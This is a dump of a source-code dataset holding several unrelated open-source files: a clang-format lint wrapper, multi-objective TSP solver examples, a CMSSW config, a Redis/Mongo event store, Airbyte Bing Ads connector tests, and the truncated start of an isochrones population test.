blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
345f5a9f62ca1f3e41b10d550144926830ab4537
|
7e6afb4986a53c420d40a2039240f8c5ed3f9549
|
/scripts/clang_git_format/clang_git_format/clang_format.py
|
584a7d860f7107600abb10c64550912981eee064
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
MRPT/mrpt
|
9ea3c39a76de78eacaca61a10e7e96646647a6da
|
34077ec74a90b593b587f2057d3280ea520a3609
|
refs/heads/develop
| 2023-08-17T23:37:29.722496
| 2023-08-17T15:39:54
| 2023-08-17T15:39:54
| 13,708,826
| 1,695
| 646
|
BSD-3-Clause
| 2023-09-12T22:02:53
| 2013-10-19T21:09:23
|
C++
|
UTF-8
|
Python
| false
| false
| 5,301
|
py
|
clang_format.py
|
import difflib
from distutils import spawn
import glob
import os
import sys
import threading
import subprocess
import logging
from .config import (PROGNAME)
from .utils import (
callo,
)
logger = logging.getLogger("clang-format")
class ClangFormat:
"""Find clang-format and linting/formating individual files.
"""
def __init__(self, clang_path, cache_dir):
"""Initialization method.
"""
self.clang_path = None
self.clang_format_progname_ext = ""
if sys.platform == "win32":
self.clang_format_progname_ext += ".exe"
# Check the clang-format the user specified
if clang_path is not None:
if os.path.isfile(clang_path):
self.clang_path = clang_path
# Check the users' PATH environment variable now
if self.clang_path is None:
# Check for various versions staring with binaries with version
# specific suffixes in the user's path
programs = [
PROGNAME
]
if sys.platform == "win32":
for i in range(len(programs)):
programs[i] += '.exe'
for program in programs:
self.clang_path = spawn.find_executable(program)
if self.clang_path:
if not self._validate_version():
self.clang_path = None
else:
break
# If Windows, try to grab it from Program Files
# Check both native Program Files and WOW64 version
if sys.platform == "win32":
programfiles = [
os.environ["ProgramFiles"],
os.environ["ProgramFiles(x86)"],
]
for programfile in programfiles:
win32bin = os.path.join(programfile,
"LLVM\\bin\\clang-format.exe")
if os.path.exists(win32bin):
self.clang_path = win32bin
break
# Have not found it yet, download it from the web
if self.clang_path is None:
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
self.clang_path = os.path.join(cache_dir,
PROGNAME
+ self.clang_format_progname_ext)
# Download a new version if the cache is empty or stale
if not os.path.isfile(self.clang_path) \
or not self._validate_version():
logger.error("Haven't found a valid %s version in PATH. ",
PROGNAME)
sys.exit(1)
# Validate we have the correct version
# We only can fail here if the user specified a clang-format binary and
# it is the wrong version
if not self._validate_version():
logger.error("Exiting because of previous warning.")
sys.exit(1)
self.print_lock = threading.Lock()
def _validate_version(self):
"""Validate clang-format is the expected version
"""
cf_version = callo([self.clang_path, "--version"])
logger.warning("Using clang-format: %s", str(cf_version))
return True
def _lint(self, file_name, print_diff):
"""Check the specified file has the correct format
"""
fo = open(file_name, 'rb')
original_file = fo.read().decode('utf-8')
# Get formatted file as clang-format would format the file
formatted_file = callo(
[self.clang_path, "--style=file", file_name]).decode('utf-8')
if original_file != formatted_file:
if print_diff:
original_lines = original_file.splitlines(keepends=True)
formatted_lines = formatted_file.splitlines(keepends=True)
result = difflib.unified_diff(original_lines, formatted_lines)
# Take a lock to ensure diffs do not get mixed when printed to
# the screen
with self.print_lock:
logger.error("Found diff for %s", file_name)
logger.info("To fix formatting errors, run %s "
"--style=file -i %s", self.clang_path,
file_name)
sys.stderr.writelines(result)
return False
return True
def lint(self, file_name):
"""Check the specified file has the correct format
"""
return self._lint(file_name, print_diff=True)
def format_func(self, file_name):
"""Update the format of the specified file
"""
if self._lint(file_name, print_diff=False):
return True
# Update the file with clang-format
formatted = not subprocess.call(
[self.clang_path, "--style=file", "-i", file_name])
# Version 3.8 generates files like foo.cpp~RF83372177.TMP when it
# formats foo.cpp on Windows, we must clean these up
if sys.platform == "win32":
glob_pattern = file_name + "*.TMP"
for fglob in glob.glob(glob_pattern):
os.unlink(fglob)
return formatted
|
b0e3867e9d255729b4f307c849d9ddf78036ba2c
|
4c8ce1a65c1543d8411b990340b0ccb84bfcf18a
|
/examples/unfinished/tsp_mo.py
|
1b0430264a49f8565a5d18b1a8ff08654737fb83
|
[
"MIT"
] |
permissive
|
scipopt/PySCIPOpt
|
e7b92c39ea1cdc32a123669614e4c06bee4b73eb
|
c6329760618a88e43e32d164e363ed233499de91
|
refs/heads/master
| 2023-09-03T13:35:16.769766
| 2023-07-03T08:33:49
| 2023-07-03T08:33:49
| 59,214,089
| 390
| 92
|
MIT
| 2023-08-07T10:44:19
| 2016-05-19T14:29:21
|
Cython
|
UTF-8
|
Python
| false
| false
| 10,031
|
py
|
tsp_mo.py
|
"""
tsp-mp.py: solve the multi-objective traveling salesman problem
Approaches:
- segmentation
- ideal point
- scalarization
Copyright (c) by Joao Pedro PEDROSO and Mikio KUBO, 2012
"""
import math
import random
from pyscipopt import Model, quicksum, multidict
def optimize(model,cand):
"""optimize: function for solving the model, updating candidate solutions' list
Will add to cand all the intermediate solutions found, as well as the optimum
Parameters:
- model: Gurobi model object
- cand: list of pairs of objective functions (for appending more solutions)
Returns the solver's exit status
"""
model.hideOutput()
model.optimize()
x,y,C,T = model.data
status = model.getStatus()
if status == "optimal":
# collect suboptimal solutions
solutions = model.getSols()
for sol in solutions:
cand.append((model.getSolVal(T, sol), model.getSolVal(C)))
return status
def base_model(n,c,t):
"""base_model: mtz model for the atsp, prepared for two objectives
Loads two additional variables/constraints to the mtz model:
- C: sum of travel costs
- T: sum of travel times
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
Returns list of candidate solutions
"""
from atsp import mtz_strong
model = mtz_strong(n,c) # model for minimizing cost
x,u = model.data
# some auxiliary information
C = model.addVar(vtype="C", name="C") # for computing solution cost
T = model.addVar(vtype="C", name="T") # for computing solution time
model.addCons(T == quicksum(t[i,j]*x[i,j] for (i,j) in x), "Time")
model.addCons(C == quicksum(c[i,j]*x[i,j] for (i,j) in x), "Cost")
model.data = x,u,C,T
return model
def solve_segment_time(n,c,t,segments):
"""solve_segment: segmentation for finding set of solutions for two-objective TSP
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
- segments: number of segments for finding various non-dominated solutions
Returns list of candidate solutions
"""
model = base_model(n,c,t) # base model for minimizing cost or time
x,u,C,T = model.data
# store the set of solutions for plotting
cand = []
# print("optimizing time"
model.setObjective(T, "minimize")
stat1 = optimize(model,cand)
# print("optimizing cost"
model.setObjective(C, "minimize")
stat2 = optimize(model,cand)
if stat1 != "optimal" or stat2 != "optimal":
return []
times = [ti for (ti,ci) in cand]
max_time = max(times)
min_time = min(times)
delta = (max_time-min_time)/segments
# print("making time range from",min_time,"to",max_time
# add a time upper bound constraint, moving between min and max values
TimeCons = model.addCons(T <= max_time, "TimeCons")
for i in range(segments+1):
time_ub = max_time - delta*i
model.chgRhs(TimeCons, time_ub)
# print("optimizing cost subject to time <=",time_ub
optimize(model,cand)
return cand
def solve_ideal(n,c,t,segments):
"""solve_ideal: use ideal point for finding set of solutions for two-objective TSP
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
- segments: number of segments for finding various non-dominated solutions
Returns list of candidate solutions
"""
model = base_model(n,c,t) # base model for minimizing cost or time
x,u,C,T = model.data
# store the set of solutions for plotting
cand = []
# print("optimizing time"
model.setObjective(T, "minimize")
stat1 = optimize(model,cand)
# print("optimizing cost"
model.setObjective(C, "minimize")
stat2 = optimize(model,cand) #find the minimum cost routes
if stat1 != "optimal" or stat2 != "optimal":
return []
times = [ti for (ti,ci) in cand]
costs = [ci for (ti,ci) in cand]
min_time = min(times)
min_cost = min(costs)
# print("ideal point:",min_time,",",min_cost
#===============================================================
# Objective function is f1^2 + f2^2 where f=Sum tx-min_time and g=Sum cx-min_cost
f1 = model.addVar(vtype="C", name="f1")
f2 = model.addVar(vtype="C", name="f2")
model.addCons(f1 == T - min_time, "obj1")
model.addCons(f2 == C - min_cost, "obj2")
# print("optimizing distance to ideal point:"
for i in range(segments+1):
lambda_ = float(i)/segments
# print(lambda_
z = model.addVar(name="z")
Obj = model.addCons(lambda_*f1*f1 + (1-lambda_)*f2*f2 == z)
model.setObjective(z, "minimize")
optimize(model, cand) # find the minimum cost routes
return cand
def solve_scalarization(n,c,t):
"""solve_scalarization: scale objective function to find new point
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
Returns list of candidate solutions
"""
model = base_model(n,c,t) # base model for minimizing cost or time
x,u,C,T = model.data
def explore(C1,T1,C2,T2,front):
"""explore: recursively try to find new non-dominated solutions with a scaled objective
Parameters:
- C1,T1: cost and time of leftmost point
- C1,T1: cost and time of rightmost point
- front: current set of non-dominated solutions
Returns the updated front
"""
alpha = float(C1 - C2)/(T2 - T1)
# print("%s,%s -- %s,%s (%s)..." % (C1,T1,C2,T2,alpha)
init = list(front)
model.setObjective(quicksum((c[i,j] + alpha*t[i,j])*x[i,j] for (i,j) in x), "minimize")
optimize(model,front)
front = pareto_front(front)
# print("... added %s points" % (len(front)-len(init))
if front == init:
# print("no points added, returning"
return front
CM = model.getVal(C)
TM = model.getVal(T)
# print("will explore %s,%s -- %s,%s and %s,%s -- %s,%s" % (C1,T1,CM,TM,CM,TM,C2,T2)
if TM > T1:
front = explore(C1,T1,CM,TM,front)
if T2 > TM:
front = explore(CM,TM,C2,T2,front)
return front
# store the set of solutions for plotting
cand = [] # to store the set of solutions for plotting
model.setObjective(T, "minimize")
stat = optimize(model,cand)
if stat != "optimal":
return []
C1 = model.getVal(C)
T1 = model.getVal(T)
# change the objective function to minimize the travel cost
model.setObjective(C, "minimize")
stat = optimize(model,cand)
if stat != "optimal":
return []
C2 = model.getVal(C)
T2 = model.getVal(T)
front = pareto_front(cand)
return explore(C1,T1,C2,T2,front)
def distance(x1,y1,x2,y2):
return math.sqrt((x2-x1)**2 + (y2-y1)**2)
def make_data(n):
x,y = {},{} # positions in the plane
c,t = {},{} # cost, time
for i in range(1,n+1):
x[i] = random.random()
y[i] = random.random()
for i in range(1,n+1):
for j in range(1,n+1):
c[i,j] = distance(x[i],y[i],x[j],y[j])
t[i,j] = 1/(c[i,j]+1.0)+0.3*random.random()
return c,t,x,y
if __name__ == "__main__":
from pareto_front import pareto_front
random.seed(7)
n = 20
c,t,x,y = make_data(n)
print("\n\n\nmultiobjective optimization: segmentation with additional (time) constraint")
segments = 6
cand_seg_time = solve_segment_time(n,c,t,segments)
print("candidate solutions:")
for cand in cand_seg_time:
print("\t",cand)
front_seg_time = pareto_front(cand_seg_time)
print("pareto front:",len(front_seg_time),"points out of",len(cand_seg_time))
for cand in front_seg_time:
print("\t",cand)
print("\n\n\nmultiobjective optimization: min distance to ideal point")
cand_ideal = solve_ideal(n,c,t,segments)
print("candidate solutions:")
for cand in cand_ideal:
print("\t",cand)
front_ideal = pareto_front(cand_ideal)
print("pareto front:",len(front_ideal),"points out of",len(cand_ideal))
for cand in front_ideal:
print("\t",cand)
print("\n\n\nmultiobjective optimization: scalarization strategy")
front_scalarization = solve_scalarization(n,c,t)
front_scalarization.sort()
print("front solutions:")
for cand in front_scalarization:
print("\t",cand)
assert front_scalarization == pareto_front(front_scalarization)
try:
import matplotlib.pyplot as P
except:
print("for graphics, install matplotlib")
exit(0)
P.clf()
P.xlabel("cost")
P.ylabel("time")
P.title("Pareto front")
# plot pareto front - scalarization
t = [ti for (ti,ci) in front_scalarization]
c = [ci for (ti,ci) in front_scalarization]
P.plot(t,c,"bo",c="black")
t = [ti for (ti,ci) in front_scalarization]
c = [ci for (ti,ci) in front_scalarization]
P.plot(t,c,c="black",lw=3,label="scalarization")
# plot pareto front - segmentation (time)
t = [ti for (ti,ci) in cand_seg_time]
c = [ci for (ti,ci) in cand_seg_time]
P.plot(t,c,"bo",c="cyan")
allpoints = [(ti,ci) for (ti,ci) in cand_seg_time]
t = [ti for (ti,ci) in front_seg_time]
c = [ci for (ti,ci) in front_seg_time]
P.plot(t,c,c="cyan",lw=3,label="segmentation (time)")
# plot pareto front - -ideal point
t = [ti for (ti,ci) in cand_ideal]
c = [ci for (ti,ci) in cand_ideal]
P.plot(t,c,"bo",c="red")
allpoints = [(ti,ci) for (ti,ci) in cand_ideal]
t = [ti for (ti,ci) in front_ideal]
c = [ci for (ti,ci) in front_ideal]
P.plot(t,c,c="red",lw=3,label="ideal point")
P.legend()
P.savefig("tsp_mo_pareto_ideal.pdf",format="pdf")
P.show()
|
6b8e58a3432fba7436a87f9a80c7428fe1d94014
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/PhysicsTools/PatAlgos/python/selectionLayer1/displacedMuonSelector_cfi.py
|
5de4cb6fd54f5f96b2c9ed51a1016f577001c181
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 212
|
py
|
displacedMuonSelector_cfi.py
|
import FWCore.ParameterSet.Config as cms
# module to select displacedMuons
#
selectedPatDisplacedMuons = cms.EDFilter("PATMuonSelector",
src = cms.InputTag("patDisplacedMuons"),
cut = cms.string("")
)
|
0049597f101849b6839e8ab31e0f8515085d57b5
|
0b4a95ce694695086e1ad43b4327f0f539361c4f
|
/jamboree/base/old/refactor.py
|
b316da0953c1080a444ee0c9cc0898b72e102119
|
[] |
no_license
|
kivo360/jamboree
|
68f3bf855e3058a0007ea18742f285a5dab1a9bb
|
235a49ac83e734a166458efc57738c5559f5124e
|
refs/heads/master
| 2023-01-04T22:40:24.166459
| 2020-10-08T21:10:04
| 2020-10-08T21:10:04
| 222,349,483
| 138
| 1
| null | 2020-11-05T10:27:52
| 2019-11-18T02:44:45
|
Python
|
UTF-8
|
Python
| false
| false
| 11,187
|
py
|
refactor.py
|
import base64
import random
from abc import ABC
from copy import copy
from multiprocessing import cpu_count
from typing import List
import maya
import orjson
import ujson
from loguru import logger
from pebble.pool import ThreadPool
from redis import Redis
from funtime import Store
from jamboree.storage.databases import (MongoDatabaseConnection,
RedisDatabaseConnection)
class EventProcessor(ABC):
def save(self, query: dict, data: dict, abs_rel="absolute"):
raise NotImplementedError
def save_many(self, query: dict, data: List[dict], abs_rel="absolute"):
raise NotImplementedError
def get_latest(self, query, abs_rel="absolute") -> dict:
raise NotImplementedError
def get_latest_many(self, query, abs_rel="absolute", limit=1000):
raise NotImplementedError
def get_between(self, query:dict, min_epoch:float, max_epoch:float, abs_rel:str="absolute") -> list:
raise NotImplementedError
def get_latest_by(self, query:dict, max_epoch, abs_rel="absolute", limit:int=10) -> dict:
raise NotImplementedError
def count(self, query: dict) -> int:
raise NotImplementedError
def remove_first(self, query: dict):
raise NotImplementedError
def pop_multiple(self, query: dict, limit: int):
raise NotImplementedError
def _bulk_save(self, query: dict, data: list):
raise NotImplementedError
def single_get(self, query:dict):
raise NotImplementedError
def single_set(self, query:dict, data:dict):
raise NotImplementedError
def single_delete(self, query:dict):
raise NotImplementedError
class Jamboree(EventProcessor):
"""Adds and retrieves events at extremely fast speeds. Use to handle portfolio and trade information quickly."""
def __init__(self, mongodb_host="localhost", redis_host="localhost", redis_port=6379):
self.redis = Redis(redis_host, port=redis_port)
self.store = Store(mongodb_host).create_lib('events').get_store()['events']
self.pool = ThreadPool(max_workers=cpu_count() * 4)
self.mongo_conn = MongoDatabaseConnection()
self.redis_conn = RedisDatabaseConnection()
self.mongo_conn.connection = self.store
self.redis_conn.connection = self.redis
# self.redis_conn.pool = self.pool
# self.mongo_conn.pool = self.pool
def _validate_query(self, query: dict):
""" Validates a query. Must have `type` and a second identifier at least"""
if 'type' not in query:
return False
if not isinstance(query['type'], str):
return False
if len(query) < 2:
return False
return True
def _generate_hash(self, query: dict):
_hash = ujson.dumps(query, sort_keys=True)
_hash = base64.b64encode(str.encode(_hash))
_hash = _hash.decode('utf-8')
return _hash
def _check_redis_for_prior(self, _hash: str) -> bool:
""" Checks to see if any """
prior_length = self.redis.llen(_hash)
if prior_length == 0:
return False
return True
def _update_dict(self, query: dict, data: dict):
query = copy(query)
timestamp = maya.now()._epoch
query['timestamp'] = timestamp
data.update(query)
return data
def _update_dict_no_timestamp(self, query: dict, data: dict):
query = copy(query)
data = copy(data)
data.update(query)
data.pop("timestamp", None)
return data
def _omit_timestamp(self, data: dict):
""" Removes timestamp if it exists. Use it to create a copied version of a dictionary to be saved in the duplicate list """
_data = copy(data)
_data.pop("timestamp", None)
return _data
def back_to_dict(self, list_of_serialized: list):
deserialized = []
if len(list_of_serialized) == 1:
return orjson.loads(list_of_serialized[0])
for i in list_of_serialized:
deserialized.append(orjson.loads(i))
return deserialized
def _save(self, query: dict, data: dict):
"""
Given a type (data entity), data and a epoch for time (utc time only), save the data in both redis and mongo.
Does it in a background process. Use with add event.
We save the information both in mongodb and redis. We assume there's many of each collection. We find a specific collection using the query.
"""
self.redis_conn.save(query, data)
self.pool.schedule(self.mongo_conn.save, args=(query, data))
"""
RESET FUNCTIONS
"""
def _reset_count(self, query: dict):
""" Reset the count for the current mongodb query. We do this by adding records in mongo back into redis. """
all_elements = self.mongo_conn.query_all(query)
self.pool.schedule(self.redis_conn.reset, args=(query, all_elements))
def reset(self, query: dict):
""" Resets all of the variables """
self.pool.schedule(self._reset_count, args=(query))
"""
DELETES FUNCTIONS
"""
def _remove(self, query: dict, details: dict):
""" Use to both remove items from redis and mongo. Add it when you need it."""
"""
Removes the given query information from the database.
It's a heavy computation on redis, as it'll require searching an entire list.
"""
self.pool.schedule(self.mongo_conn.delete_all, args=(query, details))
self.redis_conn.delete(query, details)
self.pool.schedule(self.redis_conn.delete_all, args=(query))
def _remove_first_redis(self, _hash, query: dict):
# rlock = f"{_hash}:lock"
# with self.redis.lock(rlock):
# push_key = f"{_hash}:list"
# self.redis.rpop(push_key)
pass
def remove_first(self, query: dict):
pass
# _hash = self._generate_hash(query)
# count = self._get_count(_hash, query)
# if count == 0:
# return
# self._remove_first_redis(_hash, query)
"""
SAVE FUNCTIONS
"""
def save(self, query: dict, data: dict):
self._save(query, data)
def save_many(self, query: dict, data: List[dict]):
if self._validate_query(query) == False:
# Log a warning here instead
return
if len(data) == 0:
return
for item in data:
self._save(query, item)
def bulk_upsert_redis(self, query, data):
logger.info("Default retcon redis")
self.pool.schedule(self.redis_conn.update_many, args=(query, data))
def _bulk_save(self, query, data: list):
""" Bulk adds a list to redis."""
self.redis_conn.save_many(query, data)
self.pool.schedule(self.mongo_conn.save_many, args=(query, data))
def _save_redis(self, _hash: str, data: dict):
serialized = orjson.dumps(data)
rlock = f"{_hash}:lock"
with self.redis.lock(rlock):
push_key = f"{_hash}:list"
self.redis.rpush(push_key, serialized)
def _bulk_save_redis(self, _hash: str, data: list):
serialized_list = [orjson.dumps(x) for x in data]
rlock = f"{_hash}:lock"
with self.redis.lock(rlock):
push_key = f"{_hash}:list"
self.redis.rpush(push_key, *serialized_list)
def _pop_redis_multiple(self, _hash, limit: int):
rlock = f"{_hash}:lock"
with self.redis.lock(rlock):
with self.redis.pipeline() as pipe:
latest_items = []
try:
push_key = f"{_hash}:list"
pipe.watch(push_key)
latest_items = pipe.lrange(push_key, -limit, -1)
pipe.ltrim(push_key, 0, -limit)
pipe.execute()
except Exception as e:
pass
finally:
pipe.reset()
if len(latest_items) > 0:
return self.back_to_dict(latest_items)
return latest_items
def pop_multiple(self, query, limit: int = 1):
""" Get multiple items """
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
if count == 0:
return []
return self._pop_redis_multiple(_hash, limit)
"""
Public Query Functions
"""
def query_direct(self, query):
""" Queries from mongodb directly. Used to search extremely large queries. """
latest_items = list(self.store.query_latest(query))
return latest_items
def query_direct_latest(self, query):
""" Queries from mongodb directly. Used to search extremely large queries. """
latest_items = list(self.store.query_latest(query))
if len(latest_items) > 0:
return latest_items[0]
return {}
def get_latest(self, query):
""" Gets the latest query"""
# Add a conditional time lock
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
if count > 0:
return self.back_to_dict(self.redis.lrange(f"{_hash}:list", -1, -1))
# Mongo, slowdown
latest_items = list(self.store.query_latest(query))
if len(latest_items) > 0:
return latest_items[0]
return {}
def get_latest_many(self, query: dict, limit=1000):
if self._validate_query(query) == False: return []
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
if count == 0: return []
latest_redis_items = self.back_to_dict(self.redis.lrange(f"{_hash}:list", -limit, -1))
# TODO: Get mongo tasks here
# How will this work now?
rlen = len(latest_redis_items)
if rlen == 0:
query["limit"] = limit
latest_items = list(self.store.query_latest(query))
self.reset(query)
return latest_items
return latest_redis_items
"""
SEARCH ONE FUNCTIONS
"""
def _search_one(self, item: dict, query: dict):
all_bools = []
for q in query:
if q in item:
if query[q] == query[q]:
all_bools.append(True)
else:
all_bools.append(False)
else:
all_bools.append(False)
return any(all_bools)
def _get_count(self, _hash: str, query: dict):
# Checks to see if a count already exist in redis, if not, check for a count in mongo.
_count_hash = f"{_hash}:list"
count = self.redis.llen(_count_hash)
if count is not None:
return count
records = list(self.store.query(query))
record_len = len(records)
return record_len
def count(self, query):
""" """
if self._validate_query(query) == False: return []
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
return count
|
22ea63edcb8c121515e3bc205e6a47fce6acbc83
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/dts/airbyte/airbyte-integrations/connectors/source-bing-ads/unit_tests/test_source.py
|
b19fea3127ccecc370e2b9d7b3877934e1529ff2
|
[
"MIT",
"Elastic-2.0",
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 5,995
|
py
|
test_source.py
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import json
from unittest.mock import patch
import pytest
import source_bing_ads
from airbyte_cdk.models import SyncMode
from source_bing_ads.source import AccountPerformanceReportMonthly, Accounts, AdGroups, Ads, Campaigns, SourceBingAds
@pytest.fixture(name="config")
def config_fixture():
"""Generates streams settings from a config file"""
CONFIG_FILE = "secrets/config.json"
with open(CONFIG_FILE, "r") as f:
return json.loads(f.read())
@pytest.fixture(name="logger_mock")
def logger_mock_fixture():
return patch("source_bing_ads.source.AirbyteLogger")
@patch.object(source_bing_ads.source, "Client")
def test_streams_config_based(mocked_client, config):
streams = SourceBingAds().streams(config)
assert len(streams) == 25
@patch.object(source_bing_ads.source, "Client")
def test_source_check_connection_ok(mocked_client, config, logger_mock):
with patch.object(Accounts, "read_records", return_value=iter([{"Id": 180519267}, {"Id": 180278106}])):
assert SourceBingAds().check_connection(logger_mock, config=config) == (True, None)
@patch.object(source_bing_ads.source, "Client")
def test_source_check_connection_failed(mocked_client, config, logger_mock):
with patch.object(Accounts, "read_records", return_value=0):
assert SourceBingAds().check_connection(logger_mock, config=config)[0] is False
@patch.object(source_bing_ads.source, "Client")
def test_campaigns_request_params(mocked_client, config):
campaigns = Campaigns(mocked_client, config)
request_params = campaigns.request_params(stream_slice={"account_id": "account_id"})
assert request_params == {
"AccountId": "account_id",
"CampaignType": "Audience DynamicSearchAds Search Shopping",
"ReturnAdditionalFields": "AdScheduleUseSearcherTimeZone BidStrategyId CpvCpmBiddingScheme DynamicDescriptionSetting DynamicFeedSetting MaxConversionValueBiddingScheme MultimediaAdsBidAdjustment TargetImpressionShareBiddingScheme TargetSetting VerifiedTrackingSetting",
}
@patch.object(source_bing_ads.source, "Client")
def test_campaigns_stream_slices(mocked_client, config):
campaigns = Campaigns(mocked_client, config)
accounts_read_records = iter([{"Id": 180519267, "ParentCustomerId": 100}, {"Id": 180278106, "ParentCustomerId": 200}])
with patch.object(Accounts, "read_records", return_value=accounts_read_records):
slices = campaigns.stream_slices()
assert list(slices) == [
{"account_id": 180519267, "customer_id": 100},
{"account_id": 180278106, "customer_id": 200},
]
@patch.object(source_bing_ads.source, "Client")
def test_adgroups_stream_slices(mocked_client, config):
adgroups = AdGroups(mocked_client, config)
accounts_read_records = iter([{"Id": 180519267, "ParentCustomerId": 100}, {"Id": 180278106, "ParentCustomerId": 200}])
campaigns_read_records = [iter([{"Id": 11}, {"Id": 22}]), iter([{"Id": 55}, {"Id": 66}])]
with patch.object(Accounts, "read_records", return_value=accounts_read_records):
with patch.object(Campaigns, "read_records", side_effect=campaigns_read_records):
slices = adgroups.stream_slices()
assert list(slices) == [
{"campaign_id": 11, "account_id": 180519267, "customer_id": 100},
{"campaign_id": 22, "account_id": 180519267, "customer_id": 100},
{"campaign_id": 55, "account_id": 180278106, "customer_id": 200},
{"campaign_id": 66, "account_id": 180278106, "customer_id": 200},
]
@patch.object(source_bing_ads.source, "Client")
def test_ads_request_params(mocked_client, config):
ads = Ads(mocked_client, config)
request_params = ads.request_params(stream_slice={"ad_group_id": "ad_group_id"})
assert request_params == {
"AdGroupId": "ad_group_id",
"AdTypes": {
"AdType": ["Text", "Image", "Product", "AppInstall", "ExpandedText", "DynamicSearch", "ResponsiveAd", "ResponsiveSearch"]
},
"ReturnAdditionalFields": "ImpressionTrackingUrls Videos LongHeadlines",
}
@patch.object(source_bing_ads.source, "Client")
def test_ads_stream_slices(mocked_client, config):
ads = Ads(mocked_client, config)
with patch.object(
AdGroups,
"stream_slices",
return_value=iter([{"account_id": 180519267, "customer_id": 100}, {"account_id": 180278106, "customer_id": 200}]),
):
with patch.object(AdGroups, "read_records", side_effect=[iter([{"Id": 11}, {"Id": 22}]), iter([{"Id": 55}, {"Id": 66}])]):
slices = ads.stream_slices()
assert list(slices) == [
{"ad_group_id": 11, "account_id": 180519267, "customer_id": 100},
{"ad_group_id": 22, "account_id": 180519267, "customer_id": 100},
{"ad_group_id": 55, "account_id": 180278106, "customer_id": 200},
{"ad_group_id": 66, "account_id": 180278106, "customer_id": 200},
]
@patch.object(source_bing_ads.source, "Client")
def test_AccountPerformanceReportMonthly_request_params(mocked_client, config):
accountperformancereportmonthly = AccountPerformanceReportMonthly(mocked_client, config)
request_params = accountperformancereportmonthly.request_params(account_id=180278106)
del request_params["report_request"]
assert request_params == {
"overwrite_result_file": True,
# 'report_request': <MagicMock name='Client.get_service().factory.create()' id='140040029053232'>,
"result_file_directory": "/tmp",
"result_file_name": "AccountPerformanceReport",
"timeout_in_milliseconds": 300000,
}
@patch.object(source_bing_ads.source, "Client")
def test_accounts(mocked_client, config):
accounts = Accounts(mocked_client, config)
_ = list(accounts.read_records(SyncMode.full_refresh))
mocked_client.request.assert_called_once()
|
39a462245e72d3380ffbaf3eef406fb6b452c2df
|
1cfb0aca5ab2746ff3dacf554411f326beb0676e
|
/isochrones/tests/test_populations.py
|
099ad3da9cb1642896884eb63fd6f7874c5eacfb
|
[
"MIT"
] |
permissive
|
timothydmorton/isochrones
|
b8cd9e7b41aa21459ba1459a07092fca10f5443a
|
1627b4dda2845c362c0dcb4b140b4278fc916034
|
refs/heads/master
| 2022-11-05T04:26:24.415865
| 2021-12-06T06:02:34
| 2021-12-06T06:02:34
| 19,379,027
| 113
| 72
|
MIT
| 2023-01-13T17:51:40
| 2014-05-02T15:14:25
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,045
|
py
|
test_populations.py
|
import unittest
from pandas.testing import assert_frame_equal
from scipy.stats import uniform, norm
from isochrones import get_ichrone
from isochrones.priors import ChabrierPrior, FehPrior, GaussianPrior, SalpeterPrior, DistancePrior, AVPrior
from isochrones.populations import StarFormationHistory, StarPopulation, BinaryDistribution, deredden
def old_deredden(ic, pop, accurate=False, **kwargs):
"""Old version of deredden that regenerates population from scratch with AV=0
"""
return ic.generate_binary(
pop["initial_mass_0"].values,
pop["initial_mass_1"].values,
pop["requested_age_0"].values,
pop["initial_feh_0"].values,
distance=pop["distance_0"].values,
AV=0.0,
all_As=True,
accurate=accurate,
**kwargs,
)
class PopulationTest(unittest.TestCase):
def setUp(self):
mist = get_ichrone("mist")
sfh = StarFormationHistory() # Constant SFR for 10 Gyr; or, e.g., dist=norm(3, 0.2)
imf = SalpeterPrior(bounds=(0.4, 10)) # bounds on solar masses
fB = 0.4
gamma = 0.3
